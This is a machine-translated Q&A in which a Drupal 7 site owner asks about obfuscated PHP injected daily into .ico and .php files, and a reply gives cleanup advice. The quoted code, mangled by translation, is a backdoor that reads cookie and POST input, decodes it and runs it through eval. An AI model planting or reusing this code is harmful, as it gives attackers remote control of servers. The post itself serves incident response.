Drupal 7最近的日志消息

时间:2018-05-30 13:11:51

标签: php encoding drupal drupal-7 rackspace

我正面临着一个问题。我的服务器上的每一天都使用这种代码来播放.ico文件和.php文件:

  

$ zvtizrs =' y6v1i4be#torufpkxc7_8Hg0n * -2sladm \''; $ yjzgov =   Array(); $ yjzgov [] =   $ zvtizrs [30]。$ zvtizrs [3]。$ zvtizrs [30]。$ zvtizrs [27]。$ zvtizrs [1]。$ zvtizrs [23]。$ zvtizrs [30]。$ zvtizrs [13]。$ zvtizrs [26] $。zvtizrs [6]。$ zvtizrs [20]。$ zvtizrs [31]。$ zvtizrs [30]。$ zvtizrs [26]。$ zvtizrs [5]。$ zvtizrs [3]。$ zvtizrs [27 ]。$ zvtizrs [18]。$ zvtizrs [26]。$ zvtizrs [20]。$ zvtizrs [3]。$ zvtizrs [13]。$ zvtizrs [27]。$ zvtizrs [26]。$ zvtizrs [1]。 $ zvtizrs [23]。$ zvtizrs [5]。$ zvtizrs [13]。$ zvtizrs [5]。$ zvtizrs [13]。$ zvtizrs [23]。$ zvtizrs [20]。$ zvtizrs [30]。$ zvtizrs 。[18] $ zvtizrs [17] $ zvtizrs [7]; $ yjzgov []   = $ zvtizrs [21]。$ zvtizrs [25]; $ yjzgov [] = $ zvtizrs [8]; $ yjzgov [] = $ zvtizrs [17]。$ zvtizrs [10]。$ zvtizrs [12]。$ zvtizrs [ 24] $ zvtizrs [9]; $ yjzgov []   = $ zvtizrs [28]。$ zvtizrs [9]。$ zvtizrs [11]。$ zvtizrs [19]。$ zvtizrs [11]。$ zvtizrs [7]。$ zvtizrs [14]。$ zvtizrs [7]。$ 。zvtizrs [30] $ zvtizrs [9]; $ yjzgov []   = $ zvtizrs [7]。$ zvtizrs [16]。$ zvtizrs [14]。$ zvtizrs [29]。$ zvtizrs [10]。$ zvtizrs [31]。$ zvtizrs [7]; $ yjzgov []   = $ zvtizrs [28]。$ zvtizrs [12]。$ zvtizrs [6]。$ zvtizrs [28]。$ zvtizrs [9]。$ zvtizrs [11]; $ yjzgov []   = $ zvtizrs [30]。$ zvtizrs [11]。$ zvtizrs [11]。$ zvtizrs [30]。$ zvtizrs [0]。$ zvtizrs [19]。$ zvtizrs [32]。$ zvtizrs [7]。$ 。zvtizrs [11] $ zvtizrs [22] $ zvtizrs [7]; $ yjzgov []   = $ zvtizrs [28]。$ zvtizrs [9]。$ zvtizrs [11]。$ zvtizrs [29]。$ zvtizrs [7]。$ zvtizrs [24]; $ yjzgov []   = $ zvtizrs [14]。$ zvtizrs [30]。$ zvtizrs [17]。$ zvtizrs [15]; foreach($ yjzgov [7]($ _ COOKIE,$ _POST)as $ xtfjdc => $ jqlwt){function   frtdmz($ yjzgov,$ xtfjdc,$ omljrbn){return   $ yjzgov [6]($ yjzgov [4]($ xtfjdc。$ yjzgov [0],($ omljrbn /   $ yjzgov8)+ 1),0,$ omljrbn);} function htylm($ yjzgov,   $ xwoin){return @ $ yjzgov [9]($ yjzgov [1],$ xwoin);}函数   twdine($ yjzgov,$ xwoin){$ sknbn = $ yjzgov3%3; if(!$ sknbn)   {eval($ xwoin1); exit();}} $ jqlwt = htylm($ yjzgov,   $ jqlwt); twdine($ yjzgov,$ yjzgov [5]($ yjzgov [2],$ jqlwt ^   frtdmz($ yjzgov,$ xtfjdc,$ yjzgov8)));}

你可以告诉我该怎么办? 我正在使用rackspace托管。此外,我在最近的日志中有很多这样的链接(/ d0E0MDY5VDNpanR6NDM5MzFJaQ ==)。 我怎么能阻止它?

提前致谢!

1 个答案:

答案 0 :(得分:0)

黑客攻击。我最近清理被黑网站我自己,这是噩梦。最好的方法是从备份中检索一些最新版本并立即应用所有安全更新。如果没有备份(大问题!)你可以试试"清洁"我做的网站:

  • 清除所有包含恶意内容的文件。通过所有文件搜索/替换。
  • 转储数据库并执行相同的操作以转储文件 - 删除恶意内容然后将其导回。
  • 检查用户帐户。如果有一些可疑的阻止/删除它们。
  • 检查新创建的可疑用户组。也删除它们。
  • 进行备份。
  • 应用所有安全更新/修补程序。再次进行新的备份。
  • 更改所有帐户密码(drupal管理员,ftp帐户,数据库帐户)。
  • 设置预定备份。即使用Becakup& Migrate模块。
相关问题
最新问题